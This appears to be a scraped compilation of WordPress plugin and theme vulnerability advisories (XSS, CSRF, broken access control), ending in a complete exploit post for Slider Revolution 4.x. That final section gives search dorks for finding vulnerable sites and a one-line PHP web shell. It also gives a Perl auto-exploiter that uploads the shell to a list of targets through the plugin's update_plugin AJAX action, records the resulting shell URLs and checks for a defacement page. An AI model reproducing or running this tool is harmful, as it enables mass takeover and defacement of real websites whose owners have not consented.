The Welcart e-Commerce WordPress plugin before 2.8.9 does not validate and escapes one of its shortcode attributes, which could allow users with a role as low as a contributor to perform a Stored Cross-Site Scripting attack.

CVE-2022-4655

The Greenshift WordPress plugin before 4.8.9 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.

CVE-2022-4653

The Real Testimonials WordPress plugin before 2.6.0 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.

CVE-2022-4648

The Video Conferencing with Zoom WordPress plugin before 4.0.10 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.

CVE-2022-4578

The Seriously Simple Podcasting WordPress plugin before 2.19.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.

CVE-2022-4571

Broken Access Control in Betheme theme <= 26.6.1 on WordPress.

 Betheme 7

To plugin page No VDP

 Report

New Existing

**4.3**

Medium severity CVSS 3.1 score

Known to be exploited Active attempts logged

**Protect your sites with automated security**

Enable Protection 

**Solution**

Fixed

Update the WordPress Betheme theme to the latest available version (at least 26.6.3).

**Details**Show technical details

Verified

Dave Jong discovered and reported this Broken Access Control vulnerability in WordPress Betheme Theme. This vulnerability has been fixed in version 26.6.3.

**6 other known vulnerabilities for this plugin**To plugin page

Broken Access Control vulnerability <= 26.6.1

6.3

21.11.2022

Broken Access Control vulnerability <= 26.6.1

4.3

21.11.2022

Broken Access Control vulnerability <= 26.6.1

5.4

21.11.2022

Broken Access Control vulnerability <= 26.6.1

5.4

21.11.2022

Auth. Stored CrossSite Scripting (XSS) vulnerability <= 26.6.1

5.4

21.11.2022

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-45353: WordPress Betheme premium theme <= 26.6.1 - Broken Access Control vulnerability - Patchstack

Reflected Cross-Site Scripting (XSS) vulnerability in CRM Perks Forms – WordPress Form Builder <= 1.1.0 ver.

**Solution**

Update the WordPress CRM Perks Forms plugin to the latest available version (at least 1.1.1).

Tien Nguyen Anh discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress CRM Perks Forms Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 1.1.1.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-38467: WordPress CRM Perks Forms plugin <= 1.1.0 - Reflected Cross-Site Scripting (XSS) vulnerability - Patchstack

The Mediamatic – Media Library Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.8.1. This is due to missing or incorrect nonce validation on its AJAX actions function. This makes it possible for unauthenticated attackers to change image categories used by the plugin, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVE-2023-0294: sidebar.php in mediamatic/trunk/inc – WordPress Plugin Repository

The Launchpad plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several of its settings parameters in versions up to, and including, 1.0.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVE-2023-0295: settings.php in launchpad-by-obox/tags/1.0.13/functions – WordPress Plugin Repository

WordPress Slider Revolution plugin versions 4.x.x suffer from a remote shell upload vulnerability.

=================================================================================================  
| # Title     : WordPress - Slider Revolution 4.x.x WordPress - arbitrary file upload exploit   |  
| # Author    : indoushka                                                                       |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)            |   
| # Vendor    : https://www.sliderrevolution.com/                                               |    
| # Dork      : index off revslider\backup                                                      |    
                plugins/revslider/public/assets/css/settings.css                                |  
                revslider.php "index of"                                                      |                                    
                wp-content/plugins/revslider/ 2013                                              |  
=================================================================================================

[+] poc :

[+] Web shell upload :

    The following perl exploit will attempt to upload backdoor through the update_plugin function  
    To use the exploit, be sure to compress the backdoor file with name [revslider.zip]  
  Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension  
    Because the exploit uploads a compressed file to the target

  [+] simple backdoor  :

     <?php  
     $cmd = $_GET['cmd'];  
     system($cmd);  
     ?> 

[+] create a text file with name list.txt to save in it your targets

[+] The exploit and the backdoor must be in the same folder and path

[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine 

[+] Perl exploit :

 #!/usr/bin/perl

 use LWP::UserAgent;

 system(($^O eq 'MSWin32') ? 'cls' : 'clear');

 head();

 my $usage = " \nperl $0 <list.txt>\n perl $0 list.txt";  
die "$usage" unless $ARGV[0];

 open(tarrget,"<$ARGV[0]") or die "$!";  
while(<tarrget>){  
chomp($_);  
$target = $_;

 my $path = "wp-admin/admin-ajax.php";

 print "\nTarget => $target\n";

 my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });  
$ua->timeout(10);  
$ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");  
my $req = $ua->get("$target/$path");  
if($req->is_success) {  
print "\n  [+] Xploit Possibility Work :3\n \n";

   print "  [*] Try Exploiting Vulnerability\n";  
print "  [*] Xploiting $target\n";

 my $exploit = $ua->post("$target/$path", Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["revslider.zip"]]);

 print "  [*] Sent payload\n";

 if ($exploit->decoded_content =~ /Wrong update extracted folder/) {  
print "  [+] Payload successfully executed\n";

 print "  [*] Checking if shell was uploaded\n";  
my $check = $ua->get("$target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php")->content;  
if($check =~/<br>/) {

     print "  [+] Shell successfully uploaded\n";  
    open(save, '>>Shell.txt');  
    print save "shell : $target/wp-content/plugins/revslider/temp/update_extract/revslider/cmd.php?zeb\n";  
    close(save);

  print "  [*] Checking if Deface was uploaded now\n";

 my $def = $ua->get("$target/leet.html")->content;  
if($def = ~/Hacked/) {

 print "  [+] Deface uploaded successfull\n";

  } else {print "   [-] Deface not Uploaded :/"; }  
} else { print "  [-] I'think Shell Not Uploaded :/\n"; }  
} else {  
print "  [-] Payload failed: Fail\n";  
print "\n";

 }  
} else { print "\n [-]Xploit Fail \n"}

 sub head {  
print "\t   +===============================================\n";  
print "\t   | Auto Exploiter Revslider Shell Upload \n";  
print "\t   | Edited: indoushka\n";  
print "\t   +===============================================\n";  
}  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |  
                                                                                                                                      |  
=======================================================================================================================================

Tag

#wordpress